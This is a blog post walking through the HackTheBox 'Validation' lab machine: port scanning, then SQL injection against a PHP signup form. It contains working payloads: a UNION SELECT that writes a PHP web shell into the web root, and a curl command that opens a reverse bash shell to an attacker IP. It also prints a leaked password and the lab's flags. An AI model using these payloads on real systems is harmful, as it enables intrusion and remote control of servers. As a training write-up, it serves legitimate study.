主站

分类

漏洞工具极客 Web安全系统安全网络安全无线安全设备/客户端安全数据安全安全管理企业安全工控安全

特色

头条人物志活动视频观点招聘报告资讯区块链安全标准与合规容器安全公开课

点我创作

试试在FreeBuf发布您的第一篇文章让安全圈留下您的足迹

我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序把安全装进口袋

Web安全

[Meachines] [Easy] Validation SQLI+信息泄露权限提升

maptnh 2025-02-09 20:30:18 14045

所属地海外

本文由 maptnh 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

Information Gathering

IP Address	Opening Ports
10.10.11.116	TCP:22,80,4566,8080

$ ip='10.10.11.116'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8f5efd2d3f98dadc6cf24859426ef7a (RSA)
|   256 463d6bcba819eb6ad06886948673e172 (ECDSA)
|_  256 7032d7e377c14acf472adee5087af87a (ED25519)
80/tcp   open  http    Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
4566/tcp open  http    nginx
|_http-title: 403 Forbidden
8080/tcp open  http    nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

http://10.10.11.116/account.php

username=x&country=' UNION SELECT 1--+

username=x&country=' ORDER BY 1--+

字段为1

$ python3 /home/maptnh/sqlmap-dev/sqlmap.py -r sql --batch --level 5 --risk 3 -p 'country'

$ python3 /home/maptnh/sqlmap-dev/sqlmap.py -r sql --batch --level 5 --risk 3 -p 'country' --file-read='/etc/passwd'

username=x&country=' UNION SELECT "<?php SYSTEM($_REQUEST['shell']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -

$ curl 'http://10.10.11.116/shell.php' --data-urlencode "shell=/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.28/445 0>&1'"

User.txt

3ac2b2e772e3990b49e4bff189e72540

Privilege Escalation

uhc-9qual-global-pw

Root.txt

c9c56229660a90c2f45caebacb21ecff

# web安全 # CTF

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

maptnh

Ценность жизни выше, чем кража данных.

已在FreeBuf发表 344 篇文章

本文为 maptnh 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

HackTheBox

展开更多

相关推荐

SRC之若依系统弱口令恰分攻略

SRC之若依系统弱口令恰分攻略

Web安全

SRC之若依系统弱口令恰分攻略

掌控安全EDU

81600围观 · 3收藏 · 16喜欢 2025-02-12

[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升原创

[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升

Web安全

#Apache MQ RCE #Nginx ngx_http_dav_module权限提升

47638围观 2025-02-12

[Meachines] [Easy] Pilgrimage .Git泄露+ImageMagick-LFI+binwalk-v2.3.2权限提升原创

[Meachines] [Easy] Pilgrimage .Git泄露+ImageMagick-LFI+binwalk-v2.3.2权限提升

Web安全

#.Git泄露 #ImageMagick-LFI #binwalk-v2.3.2权限提升

41187围观 2025-02-12

OpenSSL 软件库曝高危漏洞，可实施中间人攻击

OpenSSL 软件库曝高危漏洞，可实施中间人攻击

资讯

该漏洞影响 TLS 客户端，可能导致认证检查失败，攻击者可发起中间人攻击，威胁网络安全。尽快更新至最新版本至关重要。

129810围观 · 1收藏 2025-02-11

Vaadin组件下的新反序列化链寻找原创

Vaadin组件下的新反序列化链寻找

Web安全

前面分析了vaadin组件的反序列化漏洞，究其漏洞成因，核心是由于恶意getValue方法导致的方法调用问题，这里据此寻找JDK下的其他恶意...

114598围观 · 2收藏 2025-02-11

maptnh LV.9

Ценность жизни выше, чем кража данных.

344 文章数
65 关注者

[CISSP] [9] 安全漏洞,威胁和对策

2025-04-09

[CISSP] [8] 安全模型,设计和能力的原则

2025-04-09

[CISSP] [7] PKI和密码应用

2025-04-03

文章目录